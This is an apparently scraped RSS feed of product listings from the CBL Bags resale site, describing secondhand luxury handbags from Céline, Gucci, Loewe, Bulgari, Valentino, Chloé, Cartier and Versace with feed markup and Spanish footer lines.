This colorful style in pink belongs to the era in when Michael Kors was in charge of the creative direction of the French house. This bag is made of pink suede is decorated with golden stud details throughout and features a double roundle handle. Its roomy interior in a nice beige contrasts with its main color in an attractive combination. Also, the inside is divided into three parts, the central one is zipper closure.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag/ Fri, 18 Mar 2016 08:53:12 +0000 https://www.cblbags.com/?post_type=product&p=7456 This Jackie Hobo has an unexpected soft grain leather in a beautiful burgundy color. Marvelous bag!

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
The Jackie Soft hobo is an icon. This style in a marvelous burgundy color and silver hardware is still on the Gucci catalog in a wide range of leathers and colors. This one is made of a soft grain leather which gives this bag a nice appearance and silhouette. This Jackie Hobo has also a really spacious interior in suede, includes a practical zip pouch and it closes with a piston strap being the only but essential detail of the bag. Made in Italy, this style was carefully made and its edges are hand painted. In addition, its unique handle perfect to carrying on shoulder easily.

 

 

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag/ Fri, 11 Mar 2016 10:08:50 +0000 https://www.cblbags.com/?post_type=product&p=7244 This bag is a must and a basic. Light and supersoft this bag is forever.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
It is one of the most iconic bags and certainly for Loewe is a classic that never goes out of fashion. In different designs, leather and colors, the Amazona is a perfect basic wardrobe as it never gets older. This style is made of in a really soft black lambskin leather, also it shows the maxi logo and it has a silver hardware which gives it a more youthful and casual touch. This style keeps the most recognizable features like the double handle, the tirette&clochette and lock&keys. A timeless bag.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Versace Bag https://www.cblbags.com/en/p/versace-bag/ Thu, 18 Feb 2016 18:24:52 +0000 https://www.cblbags.com/?post_type=product&p=6799 This Versace style is a perfect urban style if you are looking for a free-hands style!

La entrada Versace Bag se publicó primero en CBL Bags.

]]>
This Palazzo Duffle Bag is crafted in lightly calf and pebbled leather. It features a top zip closure, double rolled top handles with stud details and it offers the chance to wear it with its detachable shoulder strap. The main ornament is the palladium Medusa at front and gold tone hardware detail. It is a perfect urban style being super light, solid and roomy.

La entrada Versace Bag se publicó primero en CBL Bags.

]]>
Bulgari Bag https://www.cblbags.com/en/p/bulgari-bag/ Mon, 15 Feb 2016 19:13:51 +0000 https://www.cblbags.com/?post_type=product&p=6707 Bulgari Serpenti Hypnotic is a jewel-bag made of aventurine and amethysts.

La entrada Bulgari Bag se publicó primero en CBL Bags.

]]>
This style is part of the latest Bulgari’s creations. A jewel-bag made of lizard leather and in a really nice “chalcedony” blue with touches of lavender. A delicate signature creation which contains some of the most characteristic features from the brand as the pink gold frame ending in the snakehead. It is a medium size bag that includes a thin strap to carry it on shoulders as well as a short handle. Its most distinctive feature is the detail of the snake showing an amethyst eyes and aventurine stones on their scales. Its interior is made in a nice calfskin. It also has a charming pocket mirror. An exclusive piece.

La entrada Bulgari Bag se publicó primero en CBL Bags.

]]>
Valentino Bag https://www.cblbags.com/en/p/valentino-bag/ Thu, 04 Feb 2016 11:12:05 +0000 https://www.cblbags.com/?post_type=product&p=6620 This style in black and white has been one of the most popular bags last season. In a smooth leather and straight lines, this bag is perfect for a really chic autumn outfit.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
This style is certainly one of the most iconic bag from the past AW Collection. Valentino launched a line full of geometric and black and white styles being this bag the perfect example. Made of an extremely soft leather, this style features a single top handle and a black leather strap which makes it perfect to carry on shoulder. Its small flap is combined with details in gold studs. Spacious and ultralight this model has become a brand’s signature.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Valentino Clutch https://www.cblbags.com/en/p/valentino-clutch/ Thu, 03 Dec 2015 09:48:21 +0000 https://www.cblbags.com/?post_type=product&p=6241 Bows are a huge part of Valentino world. The Black Satin Bow Loop is the perfect clutch for any wardrobe. Made of satin, this version in black is a must.

La entrada Valentino Clutch se publicó primero en CBL Bags.

]]>
Sophisticated, elegant and minimal. This clutch bag, who plays the best of the Italian designer, is a must to combine with any evening outfit. Its pretty satin shows a structured black triple loop. It has a golden hardware and a zip pull made of the same material. The back of the clutch bag is clean and shows the fabric itself.  The red Valentino color is discovered in the inner label located on the same shine black fabric. As an idea, wear it with a tuxedo, it will be the perfect accessory.

La entrada Valentino Clutch se publicó primero en CBL Bags.

]]>
Bulgari Bag https://www.cblbags.com/en/p/b/ Thu, 26 Nov 2015 12:06:32 +0000 https://www.cblbags.com/?post_type=product&p=6204 This Bulgari Serpenti Scaglie Day Bag from the AW14 collection, is a jewel itself.

La entrada Bulgari Bag se publicó primero en CBL Bags.

]]>
The last AW14 Campaign was for Bulgari lovers one of the most powerful collections during the past few years. And it was indeed as the bags were authentic jewels as they incorporated them on their designs. Also, the idea and inspiration of this collection was based on the beautiful city of Rome. Actually, this great “tote” was inspired by the sunset light of the city as the gold color is the main character of the bag. This also includes “scale” details on its rigid handle and the snake’s head, one of its secrets and also a famous icon of the brand, is the zipper pull. A smooth calfskin leather is the main material. One of its touches is the large flap which covers almost the front part of it. Nice!

This bag is perfectly finish, with care in every single angle and its interior is roomy and beautifully made. In a soft and great black suede has two pockets, one flat zipper close and the other is spacious and shows a delicate ivory color. It also has four metallic studs on the base to place it anywhere.

 

 

La entrada Bulgari Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-messenger-bag-croco-ivory/ Mon, 14 Sep 2015 17:41:38 +0000 https://www.cblbags.com/?post_type=product&p=5958 This Loewe Messenger made of Croco Skin in a beautiful ivory color has a splendid interior in a taupe tone. Light and resistant, its matte finished complete a really soft touch.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
It is indeed a versatile messenger cross body bag. This Loewe model is perfect for work or as weekend bag. Its palladium hardware crashes beautifully with its supreme Croco skin showing a nice matte finished. It has a spacious interior with a nice taupe suede lining. Also, it is splitted in two compartiments and has two pockets. Its crossbody band is adjustable making it easy to carry depending on your needs.

 

 

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Chloé Bag https://www.cblbags.com/en/p/chloe-bag-marcie-medium-2015-pink/ Thu, 25 Jun 2015 14:04:08 +0000 https://www.cblbags.com/?post_type=product&p=5500 Chloé "Marcie" Medium 2015 collection in "Blush Nude" pink. A beautiful bag in brand new condition. Includes removable strap, dustbag and authenticity card.

La entrada Chloé Bag se publicó primero en CBL Bags.

]]>
“Marcie” model in medium size from Chloe belonging to 2015 collection. Made in “blush nude” pink calfskin. The bag features two round, plane leather handles with brown trim. Showing matte gold hardware, main zipper close, brown trim on edges and brown fabric lining. Front part shows a flap with two bands that working as a clasp but merely ornamental. Under the flap we can find an open pocket. The Marcie is brand new; it still keeps purchase labels and part of its packaging. Includes dustbag, removable strap and authenticity card.

La entrada Chloé Bag se publicó primero en CBL Bags.

]]>
Cartier Briefcase https://www.cblbags.com/en/p/briefcase-cartier-must-burgundy-leather/ Tue, 23 Jun 2015 10:42:19 +0000 https://www.cblbags.com/?post_type=product&p=4742 Briefcase Must Cartier. An elegant item in burgundy color coming with original box and dustbag.

La entrada Cartier Briefcase se publicó primero en CBL Bags.

]]>
Briefcase Cartier from “Must” line in burgundy leather. If features gold hardware, Cartier logo embossed in leather and a simple fastener with a buttonhole that fixes the flap. Rectangular and refined shape, this briefcase is really suitable to keep and carry your documents. Lining in patterned Cartier logo fabric. Includes box and dustbag.

La entrada Cartier Briefcase se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-amazona-28-special-edition-gold-chain/ Fri, 19 Jun 2015 07:50:14 +0000 https://www.cblbags.com/?post_type=product&p=4702 Loewe Amazona 28 with golden chain. An special edition of the most iconic model in the Spanish brand.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
This Loewe Amazona model 28 in cow leather is an Special Edition featuring two handles made of a complex of golden chains. Most part of its surface shows suede with patent leather reinforcements and logo brand. Zipper close, golden hardware and inner pocket. Includes dustbag, tirette, clochette, lock and keys. Brand badge on the inside still has the plastic protection, meaning the bag is almost brand new. Handbag comes with documentation.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag-vintage-box-carriage-brown/ Wed, 17 Jun 2015 16:36:33 +0000 https://www.cblbags.com/?post_type=product&p=4661 Céline Vintage Box with "calèche" clasp. A collectors piece from the seventies, rare and highly valued, which is no longer available at Céline's.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Vintage model from Céline. This a superb, precious bag. Compact, with a straigth and rigid cut, small but very roomy, all thanks to its three inner compartments. It features gold hardware, flap with “calèche” (carruaje) fitting clasp and adjustable strap to carry the bag on your shoulder. Its splendid dark brown color matches perfectly with the smart shape of this bag from the seventies. It opens accordion like and the main compartment shows two open pockets. Back compartment has one zip close pocket with C pull.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag-vintage-caleche-burgundy/ Wed, 17 Jun 2015 16:25:09 +0000 https://www.cblbags.com/?post_type=product&p=4634 Céline Vintage Box with "calèche" clasp. A super smart, beautiful model from the seventies with flap and golden clasp which is no longer manufactured nowadays.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Vintage model from Céline. This a superb, precious bag. Compact, with a straigth and rigid cut, small but very roomy, all thanks to its three inner compartments. It features gold hardware, flap with “calèche” (carruaje) fitting clasp and adjustable strap to carry the bag on your shoulder. Its great burgundy color increases the beauty of this bag from the seventies. It opens accordion like and the main compartment shows two open pockets. Back compartment has one zip close pocket with C pull. The bag comes with dustbag.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>